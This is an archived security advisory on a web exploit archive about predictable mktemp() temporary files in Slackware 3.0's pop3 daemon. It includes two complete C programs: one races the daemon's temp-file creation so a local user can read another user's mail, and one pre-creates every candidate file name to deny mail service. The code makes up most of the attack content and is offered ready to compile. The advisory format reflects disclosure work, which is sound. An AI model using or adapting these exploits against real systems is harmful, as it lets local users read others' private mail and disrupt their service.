Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Discontinued :: linux_po.txt

Problem with mktemp()





   As explained before in the mailx security post, there is a problem with
usage of mktemp() in many programs.  This is a follow-up to that, demonstrating
the generic denial of service attack and a race condition attack on linux's
Slackware 3.0 pop3 mail daemon.  Refer to the original mailx post for
information on the security concerns with the use of mktemp().
   Linux's /usr/sbin/in.pop3d contains a mktemp() race condition, exploitable
when pop client connects to the machine at the point a correct password for
a user is entered.  This allows you to read the contents of the mail spool of
a user when they connect with a pop client.

                   Program: pop3d (/usr/sbin/in.pop3d)
Affected Operating Systems: linux - Slackware 3.0 with pop3d enabled
              Requirements: account on system, target user uses pop client
           Temporary Patch: disable pop3d
       Security Compromise: any user with an account can read mail of a user
                            using a pop client to read mail.
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: The predictability of mktemp() is exploited to
                            create the temporary files after the filenames
                            have been determined but before they are actually
                            created, allowing the mail being dumped to those
                            temporary files to be read by the creator of the
                            files.

pop3d-exploit.c:
/* This program creates temporary files used by in.pop3d (/usr/sbin/in.pop3d
   under Slackware 3.0), which can then be read by the program.
   This race condition is NOT always successful, it may take extreme conditions
   to ensure a high probability of success.

   Dave M. (davem@cmu.edu)
 */

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

main(int argc, char **argv)
{
  int race;
  int i;
  char fname[80], tmpf[80];    /* hold filename */

  umask(0);

  if(argc<1)
    {
      printf("pop3 racer\nSyntax: %s process-id\n",argv[0]);
      return -1;
    }

  /* create tmp file to race creating */
  strcpy(tmpf,"/tmp/pop3");
  for(i=strlen(argv[1]);i<6;i++)
    strcat(tmpf,"0");
  strcat(tmpf,argv[1]);
  tmpf[9] = 'a';

  race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

  while(1)
    {
      rename(tmpf,"/tmp/pop.exploit");
      if(rename("/tmp/pop.exploit",tmpf) < 0)
        {
          printf("race lost - file created.\n"); /* catch 1/2 the losses */
          break;
        }
    }
}

                   Program: Any with termination on mktemp() failure
Affected Operating Systems: Any with predictable mktemp() return values
              Requirements: write access to directory temp files written to
       Security Compromise: denial of service
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: Many operating systems have an extremely limited
                            temporary file creation algorithm, which results
                            in denial of service attacks on any program that
                            uses them exceedingly easy.


deny-mktemp.c:
/* This programs opens the complete set of temporary files tested with mktemp()
   for a given template (with 6 X's), usually resulting in the program
   terminating upon failure to find an open file.  In pop3d, this prevents a
   pop client from reading their mail.

   Dave M. (davem@cmu.edu)
*/

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* template found in program's header file, minus X's */
#define TEMPLATE "/tmp/pop3"

main(int argc, char **argv)
{
 long int i,j;
 char fname[20];

 if(argc<2)
   {
     printf("Syntax: %s process-id\n");
     return -1;
   }

  j = strlen(TEMPLATE);

  strcpy(fname,TEMPLATE);
  for(i=strlen(argv[1]);i<6;i++)
    strcat(fname,"0");
  strcat(fname,argv[1]);

 for(i=0;i<26;i++)
   {
     fname[j] = 'a' + i;
     creat(fname,O_WRONLY | O_CREAT);
   }

 for(i=0;i<26;i++)
   {
     fname[j] = 'A' + i;
     creat(fname,O_WRONLY | O_CREAT);
   }

 for(i=0;i<9;i++)
   {
     fname[j] = '0' + i;
     creat(fname,O_WRONLY | O_CREAT);
   }

}










TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH